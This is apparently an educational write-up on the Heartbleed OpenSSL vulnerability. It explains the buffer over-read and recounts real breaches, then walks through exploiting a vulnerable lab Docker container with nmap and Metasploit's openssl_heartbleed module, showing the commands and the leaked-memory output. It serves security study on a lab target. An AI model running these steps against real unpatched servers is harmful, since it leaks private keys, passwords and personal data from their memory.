CVE-2014-0160: Heartbleed

Introduction

Heartbleed is a vulnerability that allows attackers unprecedented access to sensitive information in memory. It was a serious bug in OpenSSL, an open source code library that implemented the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. Heartbleed is discovered in April 2014 and it caused millions of web servers being vulnerable to be attacked. It is due to a missing bounds check in the TLS Heartbeat Extension.

What is Heartbeat?

When two computers communicating, it is necessary to know the status of each other. Heartbeat is a kind of network which can let two computers to know each other that they are still connected even if there is not any downloading or uploading at the moment. One of the computers will send an encrypted piece of data called a Heartbeat Request occasionally to the other. The second computer will reply back with the exact same encrypted piece of data, proving that the connection is still in place.

How Heartbleed works?

The Heartbeat Request includes information about its own length, and the computer that received the heartbeat request never checked to make sure the request was actually as long as it claimed to be. For example, if a heartbeat request said it was 40 KB long but was actually only 20 KB, the receiving computer would set aside 40 KB of memory buffer. Then it will store the 20 KB actually received and send back 20 KB more whatever in the next 20 KB of memory. That extra 20 KB of data may contain sensitive information, such as usernames and passwords that the attacker wants to obtain. In computer security, it is known as buffer over-read. how_heartbleed_works

Heartbleed Real Cases

  • The Canada Revenue Agency (CRA) reported a theft of Social Insurance Numbers belonging to 900 taxpayers on April 8, 2014. After the discovery of the attack, the CRA temporarily shut down some access to its website late on April 8 in response to security concerns about the Heartbleed bug. On April 16, a computer science student was charged in relation to the theft with unauthorized use of a computer and mischief in relation to data.
  • In August 2014, the security keys from Community Health Systems, the second-biggest for-profit U.S. hospital chain in the United States, compromising the confidentiality of 4.5 million patient records were stolen due to the Heartbleed vulnerability.

Implementation

Since the Heartbleed vulnerability has been fixed after it was discovered, to perform Heartbleed, we need to obtain a Docker container affected by Heartbleed.

Step 1: Install Docker, Nmap and Metasploit

First of all, make sure that Docker, Nmap and Metasploit have been installed. Here are some online resources about installations (for Ubuntu 18.04.2): Docker installation: https://docs.docker.com/install/linux/docker-ce/ubuntu/ Nmap installation: https://nmap.org/download.html Metasploit installation: https://www.darkoperator.com/installing-metasploit-in-ubunt/

Step 2: Obtain the container affected by Heartbleed

Once the installation finished, you may obtain the Heartbleed container by running commands:

$ sudo docker run -d andrewmichaelsmith/docker-heartbleed

Step 3: Obtain Docker image ID and IP address

Obtain Docker image ID by following command:

$ sudo docker ps

Then you can obtain an IP address for the container.

$ sudo docker inspect <image ID> | grep IPAddress

Afterwards, using Nmap to scan the IP address and port number for the container to ensure that they are detectable or not.

$ sudo nmap -p <port_number> --script ssl-heartbleed <ip_address>

Step 4: Metasploit configuration

Firstly, launching Metasploit and OpenSSL Heartbleed by:

$ msfconole -q
msf > use auxiliary/scanner/ssl/openssl_heartbleed

Then showing Metasploit options.

msf5 > auxiliary(openssl_heartbleed) > show option

Now you can see a list of Metasploit options as following:

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

But the RHOSTS is missing. Set the RHOSTS to the IP address obtained in Step 2.

msf5 > auxiliary(openssl_heartbleed) > set RHOSTS <ip_address>

Afterwards, set VERBOSE to True to see it all.

msf5 > auxiliary(openssl_heartbleed) > set VERBOSE true

Step 5: Exploit it!

Starting the Heartbleed attack by:

msf5 > auxiliary(openssl_heartbleed) > exploit

Then the contents of Docker container’s memory will be displayed on screen! (In this example, ='172.17.0.2', ='443'):

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[*] 172.17.0.2:443        - Leaking heartbeat response #1
[*] 172.17.0.2:443        - Sending Client Hello...
[*] 172.17.0.2:443        - SSL record #1:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  86
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 82
[*] 172.17.0.2:443        - 		Type:   Server Hello (2)
[*] 172.17.0.2:443        - 		Server Hello Version:           0x0301
[*] 172.17.0.2:443        - 		Server Hello random data:       5c96decbd982591e1ded4eb483cbb7263ee4b57c8040f04912fd9a31b7d505fa
[*] 172.17.0.2:443        - 		Server Hello Session ID length: 32
[*] 172.17.0.2:443        - 		Server Hello Session ID:        c119666e63af2ab8c58218501d45105d8cff5da88c71b68b23af6bb7df7e5881
[*] 172.17.0.2:443        - SSL record #2:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  921
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 917
[*] 172.17.0.2:443        - 		Type:   Certificate Data (11)
[*] 172.17.0.2:443        - 		Certificates length: 914
[*] 172.17.0.2:443        - 		Data length: 917
[*] 172.17.0.2:443        - 		Certificate #1:
[*] 172.17.0.2:443        - 			Certificate #1: Length: 911
[*] 172.17.0.2:443        - 			Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=www.example.com,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=www.example.com,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x000056356ef53ee0>, not_before=2014-04-10 20:45:22 UTC, not_after=2015-04-10 20:45:22 UTC>
[*] 172.17.0.2:443        - SSL record #3:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  525
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 521
[*] 172.17.0.2:443        - 		Type:   Server Key Exchange (12)
[*] 172.17.0.2:443        - SSL record #4:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  4
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 0
[*] 172.17.0.2:443        - 		Type:   Server Hello Done (14)
[*] 172.17.0.2:443        - Sending Heartbeat...
[*] 172.17.0.2:443        - Heartbeat response, 65535 bytes
[+] 172.17.0.2:443        - Heartbeat response with leak, 65535 bytes
[*] 172.17.0.2:443        - Printable info leaked:
......\..@.. ...Q......4kM=S.~V}.@R.....f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.................................................................................................................................................................................................................................................................................................................................e@.....................}.@....6...J......9._R...t....Q....c.r......~..Z.y.B.*).2JFzc^..Y.7{...3..F..;r....x.[....xt.}.......3...b....t}.....h..9>.$!.........:..J%...p....Z...=......x&...qB.w...6...HS%..7B.$k..i._*).t..!.j..5L.u.....}...W.....6i.nW...}.B.l....%..h..S........W_....J.....A.g..!K..h.p..OI]xVh.-.....L.j.....(....t.......n"r6.9....}......#..j..gf{.U....L..JUo....c..X.>.fI.4..#..[*B..1..;C.4...x~....Y.{.YB.,.9....*.[.r..@[.I...H.`...3:..iekn"...W.......J.$.@o.{.^.C..@.....{...gZw5..L.ga.......q..0%).........W..../..k..c.h5.:.........[~...#.!S...rh..r...._%.%......P0N0...U........G...1.."..mud.a.%.0...U.#..0.....G...1.."..mud.a.%.0...U....0....0...*.H.............V..E..9\P..X@..D.........~...tV.T.;.y.V...E..-...A.=....q....p.....h....7..p.N~.>.sQ>..~.5..*..Kb..E5:r.......z..j.p".,.....&.{....XT..b.......z.{.2...%/..9$7~O..Y..+..<..~J.n.9.7..2b..7....Y..O^vsx"Q...\....I..].O.(.;........e..".i...3g.../^....rvQ.D$.X..................................................................................................................................... repeated 14866 times .....................................................................................................................................@..................................................................................................................................... repeated 159 

References

“Heartbleed”, https://en.wikipedia.org/wiki/Heartbleed “Heartbeat (computing)”, https://en.wikipedia.org/wiki/Heartbeat_(computing) “The Heartbleed Bug”, http://heartbleed.com/ “What is the Heartbleed bug, how does it work and how was it fixed?”, https://www.csoonline.com/article/3223203/what-is-the-heartbleed-bug-how-does-it-work-and-how-was-it-fixed.html “Quickie: exploiting Heartbleed (CVE-2014–0160)”, https://bytesoverbombs.io/quickie-exploiting-heartbleed-cve-2014-0160-b9e0f0091683